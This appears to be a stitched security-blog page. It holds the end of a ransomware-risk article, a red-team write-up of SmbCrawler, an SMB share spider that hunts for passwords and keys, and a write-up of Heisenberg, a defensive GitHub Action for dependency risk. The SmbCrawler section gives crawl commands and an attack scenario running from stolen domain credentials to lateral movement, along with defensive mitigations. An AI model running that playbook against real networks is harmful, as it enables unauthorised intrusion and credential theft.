On the offensive side of the chessboard, law enforcement has started to target the infrastructure that allows ransomware crews, access brokers, and hosting providers to operate at scale. Europol’s Operation Endgame, for example, focused on takedowns against a global cybercrime network that leveraged malware and botnets as part of the ransomware “kill chain,” disrupting command infrastructure and making it harder for crews to recycle toolchains across victims as described in Europol’s announcement of the operation. These actions matter, but they do not remove the need for enterprises to treat systemic ransomware as a predictable, modelled risk class rather than a string of bad luck headline events.

CISO Playbook: Treat Ransomware as a Category-3 Risk

For CISOs, the lesson from JLR, Toyota, and Ferrari is simple: assume that a ransomware or extortion crew will eventually have a path to your ecosystem, and focus on limiting how far an intrusion can propagate through suppliers and operations. That means treating ransomware scenarios with the same discipline as safety and business continuity planning, not as an afterthought in an endpoint protection strategy. It also means tying security investment back to the real economics of extortion and access markets, something we analysed more deeply in Ransomware Payments vs Rising Incident Counts in 2025.

Map your “category-3” blast radius by identifying which plants, suppliers, and shared platforms would create systemic impact if they were offline for four weeks, then align tabletop exercises to those specific scenarios.
Instrument external access and partner connectivity as first-class telemetry, including identity-centric logging for VPNs, OT gateways, and supplier portals, and treat anomalous access from valid accounts as a high-severity detection, not noise.
Push contractual and technical controls into the supply chain, including mandatory MFA, minimum logging standards, incident notification windows, and joint response playbooks with key suppliers and integrators.

Handled properly, systemic ransomware events become stress tests that the organisation can rehearse and model, not pure black swans. The JLR incident is a painful example, but it also gives boards and CISOs a concrete reference to work from: real losses, real downtime, and a clear picture of what happens when extortion campaigns scale beyond a single victim into an entire industrial ecosystem.

This article is for educational and defensive purposes only. It does not endorse or promote illegal activity.

SmbCrawler – SMB Share Discovery and Secret-Hunting

SmbCrawler is a credentialed SMB spider that takes domain credentials and a list of hosts, then aggressively walks network shares for you. It checks permissions, crawls directory trees, auto-downloads interesting files, and reports likely secrets such as passwords, SSH keys, configuration files, DPAPI blobs, and database dumps. For internal red teams, it is a purpose-built engine for turning “we have a foothold” into “we own the file servers”.

Overview

Every serious internal pentest or red-team engagement ends up abusing SMB misconfiguration. Shared drives still hold plaintext creds, exported mailboxes, unprotected backups, and “temporary” dumps that never got cleaned up. Doing this manually with basic tools and Windows Explorer is slow and noisy. SmbCrawler solves that by automating the boring parts:

Take credentials once.
Feed it hostnames, IP ranges, or Nmap XML.
Let it enumerate shares, permissions, and directory structures at scale.
Automatically pull down files that match secret-hunting profiles into a structured SQLite-backed data store.

The result is an internal discovery and exfil pipeline that you can run in hours, not days, with a repeatable output format you can grep, query, and report from.

Features

From the live README, SmbCrawler ships with a carefully designed feature set:

Flexible target input – accepts hostnames, single IPs, IP ranges or Nmap XML files as input.
Permission checks – tests authentication as guest and as supplied user, share access, and (optionally) write access by creating a temporary directory.
Configurable crawl depth – control how deep to walk each share, with separate profiles to override depth for specific paths.
Pass-the-hash support – operate with NTLM hashes instead of cleartext passwords when necessary.
Interesting file detection – ships with profiles that flag and download likely high-value files (credentials, configs, dumps, keys).
Threaded, pausable engine – multi-threaded crawling with runtime controls to pause, skip hosts or shares, and inspect status.
SQLite-backed output – writes findings to a SQLite database and a structured output directory, plus optional interactive HTML reporting.

Installation

SmbCrawler is a Python tool published on PyPI. The author explicitly recommends using pipx so you do not pollute your system Python. Installation examples from the README:

# Minimal install
pipx install smbcrawler

# Recommended install with binary conversion helpers (PDF, XLSX, DOCX, ZIP...)
pipx install "smbcrawler[binary-conversion]"

The extra [binary-conversion] dependency pulls in MarkItDown so SmbCrawler can convert common binary formats to text before scanning them for secrets. For red-team use, you almost always want this turned on.

Usage

The README’s quick example shows a typical crawl against a file of targets with domain credentials:

$ smbcrawler crawl -i hosts.txt -u pen.tester -p iluvb0b -d contoso.local -t 10 -D 5

That command:

Uses hosts.txt as the target list.
Authenticates as pen.tester in the contoso.local domain.
Spawns 10 worker threads (-t 10).
Crawls each share up to depth 5 (-D 5).

At runtime, you can interact with the crawler:

p – pause and selectively skip hosts or shares.
<space> – print current progress.
s – show a more detailed status view.

The profile system does the heavy lifting. Profiles (YAML) define which files, directories, and shares are “interesting”, where to dig deeper, and which secrets to flag. You can supply your own profiles alongside the built-in defaults to target specific line-of-business apps or internal naming schemes.

Attack Scenario

Objective: turn one compromised Windows credential into complete knowledge of SMB data exposure, plus a curated bag of loot, in a single engagement sprint.

Obtain valid domain credentials via phishing, password spraying or a prior foothold.
Enumerate potential SMB hosts using existing tools (for example keimpx or Nmap scripts) and export them to a target file.
Run SmbCrawler with a shallow depth (for example -D 1) and optional write checks to map which hosts and shares are readable and writable. Save this as a dedicated crawl file.
Use the initial database to prioritise “high-value” shares, then rerun SmbCrawler with deeper depth and tuned profiles against a reduced host set.
From the SQLite database and downloaded files, extract passwords, SSH keys, VPN configs, DPAPI blobs, application secrets and database dumps. Feed those into lateral movement tooling such as NetExec to pivot further.
Optionally, map resulting privileges and paths in Active Directory with BloodHound, turning share-level findings into full graph-based attack paths.

Red Team Relevance

SmbCrawler hits a rare sweet spot between practicality and depth. It is fast enough to run routinely on real client networks, and opinionated enough to surface valuable loot instead of dumping terabytes of junk. From a red-team perspective, you can:

Quantify SMB exposure: “X hosts, Y readable shares, Z with write access, N high-value secrets found”.
Build repeatable playbooks for different client environments by shipping pre-tuned profiles with your engagement kit.
Tighten operational security: SmbCrawler lets you avoid noisy manual browsing and random PowerShell scripts scattered through jump boxes.

It also plays nicely with other offensive SMB tooling already covered on Darknet. Combine share discovery and credential validation (keimpx, CredNinja, NetExec) with SmbCrawler’s deep crawl to show how quickly a motivated attacker can move from “one set of creds” to “everyone’s home drive” in a typical enterprise.

Detection and Mitigation

From the blue-team side, SmbCrawler’s capabilities translate directly into controls you should prioritise:

Audit share permissions regularly – especially “Everyone” and “Authenticated Users” access on sensitive roots and profile shares.
Harden write access – limit where regular users can create directories and files; SmbCrawler’s write-check feature highlights exactly where an attacker could drop tooling or weaponised documents.
Reduce sensitive data on shares – remove or encrypt cleartext passwords, SSH keys, DPAPI master keys, and dumps from general-purpose shares.
Monitor for unusual enumeration patterns – multi-threaded crawlers often create recognisable patterns in SMB logs. Look for high-volume directory listings and repeated access to new hosts from a single source.
Feed SmbCrawler-like data into DLP and UEBA – if you cannot prevent broad read access, at least detect when unusual principals traverse large portions of your file estate.

Comparison

SmbCrawler sits in a crowded but uneven space:

Versus simple scanners (keimpx, basic Nmap scripts) – those excel at credential validity and share enumeration, but they do not deeply crawl content or classify secrets. SmbCrawler keeps going until it finds the actual loot.
Versus manual PowerShell and ad-hoc scripts – bespoke scripts are flexible but rigid to maintain and report from. SmbCrawler’s SQLite output and profile system provide a single, consistent source of truth per engagement.
Versus general recon frameworks (Sn1per, Scanners-Box) – frameworks give you breadth across many protocols; SmbCrawler gives you depth for one of the most abused internal attack surfaces: Windows file shares.

Conclusion

If your internal engagements touch Windows networks, SmbCrawler deserves a permanent slot in your toolkit. It turns a messy mix of SMB servers, legacy shares, and forgotten exports into a structured map of permissions and secrets you can actually act on. For defenders, running it in a controlled way gives you a painful but accurate picture of real data exposure – the same image a motivated attacker would see.

You can read more or download SmbCrawler here: https://github.com/SySS-Research/smbcrawler

Heisenberg Dependency Health Check – GitHub Action for Supply Chain Risk

Heisenberg Dependency Health Check is a GitHub Action that inspects only the new or modified dependencies introduced in a pull request. It analyses lockfiles or manifest changes, gathers health and risk signals from deps.dev and other heuristics, and posts a detailed dependency health report directly on the pull request. It highlights suspicious, low-quality, or unusually fresh packages before they reach your main branch.

Overview

Modern supply-chain attacks increasingly rely on introducing malicious or low-trust dependencies through everyday development workflows. Traditional scanners often run periodically and focus on known vulnerabilities, which miss early indicators of risk. Heisenberg takes a different approach: it hooks directly into the pull request, detects which packages were added or updated, and reviews them in isolation. Running at merge time, it gives reviewers actionable risk signals exactly when decisions are made.

The tool is ecosystem-agnostic and supports Python, JavaScript, and Go dependency formats. It can detect unusual publish timings, maintenance red flags, popularity issues, suspicious scripts, and other patterns associated with supply-chain compromise. If configured, it can also label or block pull requests that exceed risk thresholds.

Features

Delta-based scanning: evaluates only new or changed dependencies rather than rescanning the entire dependency graph.
Multi-ecosystem support: works with poetry.lock, requirements.txt, uv.lock, package-lock.json, yarn.lock and go.mod.
Risk and health signals: pulls advisories, maintenance metrics, popularity data, dependents, and incredibly fresh publishes that may indicate rushed or suspicious releases.
npm script checks: highlights post-install script behaviours that attackers frequently abuse.
Pull request reporting: posts a structured dependency health comment with links to package intelligence sources.
Policy controls: can add a security review label or fail the job if risky packages are introduced.

Installation

The following workflow is taken directly from the Heisenberg documentation and should be placed inside .github/workflows/ in your repository. It monitors standard dependency files and runs the action whenever one of them changes.

name: Heisenberg Health Check
on:
  pull_request:
    paths:
      - "**/poetry.lock"
      - "**/uv.lock"
      - "**/package-lock.json"
      - "**/yarn.lock"
      - "**/requirements.txt"
      - "**/go.mod"

permissions:
  contents: read
  pull-requests: write
  issues: write

jobs:
  deps-health:
    runs-on: ubuntu-latest
    steps:
      - uses: actions/checkout@v4

      - name: Detect changed manifest
        id: detect
        run: |
          git fetch origin ${{ github.base_ref }} --depth=1
          LOCK_PATH=$(git diff --name-only origin/${{ github.base_ref }} | \
            grep -E 'poetry.lock$|uv.lock$|package-lock.json$|yarn.lock$|requirements.txt$|go.mod$' | head -n1 || true)
          echo "lock_path=$LOCK_PATH" >> $GITHUB_OUTPUT

      - name: Heisenberg Dependency Health Check
        uses: AppOmni-Labs/heisenberg-ssc-gha@v1
        with:
          package_file: ${{ steps.detect.outputs.lock_path }}

Usage

Once the workflow is active, the process is automatic:

A pull request modifies a dependency manifest.
The workflow detects the change and hands the specific file to Heisenberg.
Heisenberg evaluates only the added or modified packages.
A health report appears as a comment on the pull request.
Optional: risky changes can trigger a label or cause the job to fail, blocking the merge.

Teams using additional GitHub Action hardening tools, such as Claws, can pair Heisenberg with workflow linting to reduce risks from both automated misuse and compromised dependencies.

Attack Scenario

Objective: demonstrate how a hostile dependency attempt would be detected during a realistic development flow.

Set up a demo repository with the Heisenberg workflow enabled.
Add or bump a dependency known for suspicious activity, poor maintenance, or very recent publishes.
Open a pull request as if performing a routine update.
Heisenberg evaluates only the changed dependency and posts a health report highlighting all relevant concerns.
Point stakeholders to the flagged signals as evidence of supply-chain risk and why automated guardrails matter.

This adversarial modelling pairs well with internal reviews using Darknet’s write-ups on automation abuse, such as Weaponizing Dependabot, helping teams understand how automated tooling can be exploited without proper controls.

Red Team Relevance

Although Heisenberg is built for defenders, red teams can use it to:

Identify weak or unvetted dependency update practices in target environments.
Model realistic compromise paths that depend on dependency injection or typosquatting.
Show how quickly risk would be caught if the organisation had Heisenberg or similar controls in place.

It also pairs naturally with supply-chain reconnaissance tools and GitHub workflow analysis techniques. For example, secret-exposure tools like Veles excel at key detection, while OAuth-abuse research such as GitPhish highlights broader risks inside CI/CD ecosystems.

Detection and Mitigation

Restrict dependency changes to pull requests so that Heisenberg has complete visibility.
Centralise reports so security teams can see patterns across repositories.
Harden GitHub workflows to prevent bypass paths; tools like Claws help enforce safe workflow practices.
Threat model dependency automation using lessons from Darknet’s coverage of Dependabot exploitation and broader CI/CD abuse.
Introduce routine chaos tests using intentionally risky but harmless packages to ensure detection logic remains effective.

Comparison

Heisenberg differs from scheduled composition scanners by focusing on changes rather than the full dependency tree. It gives teams real-time merge-time intelligence without slowing developer workflows. Compared to broader GitHub workflow hardening tools, it focuses specifically on package-level supply-chain risk, making it a complementary part of a complete CI/CD security posture.

Conclusion

Heisenberg Dependency Health Check provides a high-signal, low-friction control to catch risky dependencies during code review. By focusing strictly on the packages developers are adding or updating, it keeps supply-chain risk visible without overwhelming teams with noise. It is a practical upgrade for any team that relies heavily on open-source packages and wants to prevent supply-chain compromise before it enters the build pipeline.

You can read more or download Heisenberg Dependency Health Check here: https://github.com/AppOmni-Labs/heisenberg-ssc-gha

Writing Worms for Fun or Profit

Related Posts:

Most Viewed Posts

Search

Recent Posts

Related Posts:

Reader Interactions

Comments

Footer

Most Viewed Posts

Search

Recent Posts

Tags